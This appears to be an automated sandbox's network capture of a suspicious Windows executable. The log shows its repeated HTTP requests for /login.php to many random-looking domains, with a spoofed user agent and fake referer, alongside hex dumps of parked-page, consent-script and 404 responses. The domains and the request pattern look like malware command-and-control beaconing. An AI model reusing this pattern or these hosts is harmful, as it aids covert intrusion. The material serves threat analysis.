                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.828485012 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVhODhlYTAtMzZhNy00ZTRlLThmNjAtNWQxMTM5YjFkZjY1IiwicGFnZV90aW1lIjoxNzMxMzQ0OTA1LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            58192.168.2.962612178.162.203.211801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.402143002 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            59192.168.2.96261318.208.156.248801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.504271030 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vonypom.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.926847935 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344905|1731344858|23|2|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            60192.168.2.96261444.221.84.105801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.504405975 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vocyzit.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.964348078 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344905|1731344858|23|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            61192.168.2.962617178.162.203.211801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.328807116 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            62192.168.2.9626153.94.10.34801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.336595058 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.788459063 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:26 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344906|1731344858|24|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            63192.168.2.962616199.191.50.83801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.340548038 CET279OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com
                                                                                                                                                                                                            Cookie: vsid=910vr4788904590031611
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500433922 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:26 GMT
                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Data Raw: 61 39 33 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: a93e<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500567913 CET1236INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                            Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500580072 CET1236INData Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20
                                                                                                                                                                                                            Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500593901 CET1236INData Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72
                                                                                                                                                                                                            Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500605106 CET848INData Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e
                                                                                                                                                                                                            Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500617981 CET1236INData Raw: 3d 30 29 7b 74 3d 76 28 22 64 69 76 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 70 61 6e 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 69 6e 73 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d
                                                                                                                                                                                                            Data Ascii: =0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){v
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500632048 CET1236INData Raw: 73 3a 22 73 74 75 62 22 2c 64 69 73 70 6c 61 79 53 74 61 74 75 73 3a 22 68 69 64 64 65 6e 22 2c 61 70 69 56 65 72 73 69 6f 6e 3a 22 32 2e 32 22 2c 63 6d 70 49 64 3a 33 31 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 61 5b 32 5d 28 66 61 6c 73 65 2c 74
                                                                                                                                                                                                            Data Ascii: s:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]===
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500643015 CET28INData Raw: 65 6d 6f 76 65 64 22 2c 6c 69 73 74 65 6e 65 72 49 64 3a 65 2c 64 61 74 61 3a 68 2c
                                                                                                                                                                                                            Data Ascii: emoved",listenerId:e,data:h,
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500696898 CET1236INData Raw: 70 69 6e 67 44 61 74 61 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65
                                                                                                                                                                                                            Data Ascii: pingData:window.cmp_gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return nul
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.500710011 CET1236INData Raw: 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 67 70 70 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e
                                                                                                                                                                                                            Data Ascii: ction(h,g){var e={__gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.507066011 CET1236INData Raw: 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70
                                                                                                                                                                                                            Data Ascii: f(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            64192.168.2.96261918.208.156.248801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.358057976 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vonypom.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.789223909 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:26 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344906|1731344858|24|2|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            65192.168.2.962618154.212.231.8280
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.358696938 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.235456944 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:27 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            66192.168.2.96262023.253.46.64801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.410521030 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.819720984 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:21 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
